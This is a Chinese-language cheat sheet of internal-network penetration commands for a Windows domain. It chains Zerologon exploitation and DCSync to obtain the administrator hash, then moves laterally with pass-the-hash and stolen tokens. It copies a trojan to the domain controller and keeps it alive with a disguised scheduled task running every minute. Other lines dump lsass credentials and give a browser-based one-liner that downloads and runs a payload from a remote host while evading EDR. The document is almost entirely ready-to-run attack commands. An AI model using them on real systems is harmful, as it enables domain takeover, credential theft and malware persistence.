一些内网渗透命令
#抓取密码
logonpasswords
#查看域控IP、列表
shell ping pentest.com
shell net group "Domain Controllers" /domain
#使用zerologon漏洞将域控机器密码置空
mimikatz lsadump::zerologon /target:192.168.136.129 /account:WIN-DOBHQK3TVES$ /exploit
#使用空机器密码读取管理员哈希
mimikatz lsadump::dcsync /domain:pentest.com /dc:WIN-DOBHQK3TVES /User:Administrator /authuser:WIN-DOBHQK3TVES$ /authdomain:pentest /authpassword:"" /authntlm
#使用管理员哈希pth横向移动
mimikatz sekurlsa::pth /user:administrator /domain:pentest /ntlm:579da618cfbfa85247acf1f800a280a4 /run:"powershell -nop -w hidden"
#窃取令牌并上传木马至域
steal_token <pid>
shell copy C:\Users\user1\Desktop\https-processinject.exe \\192.168.136.129\c$\users\public
#设置计划任务
shell schtasks /create /s 192.168.136.129 /tn WindowsUpdate /sc minute /mo 1 /tr C:\users\public\https-processinject.exe /ru system /f
#域控上线后,选择域控的交互命令,使用zerologon漏洞还原机器密码
mimikatz lsadump::postzerologon /target:192.168.136.129 /account:WIN-DOBHQK3TVES$
#绕过EDR使用浏览器下载并执行
start msedge http://192.168.1.1:19900/NNNNnop.rar && ping -n 10 127.0.0.1 >NUL && for /f %k in ('cmd /v:off /Q /c "for /f %i in (^'wmic logicaldisk get caption ^| findstr ":"^') do dir %i\ /b /s 2>nul | findstr "NNNNnop.rar""') do set kk=%k && (set dd=%kk:NNNNnop.rar=123456.exe%) && rename %k 123456.exe && ping -n 10 127.0.0.1 >NUL && cmd /c %dd%
#使用不杀的procdump来导出目标主机的lsass.dmp,到本机用mimikatz读取密码
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit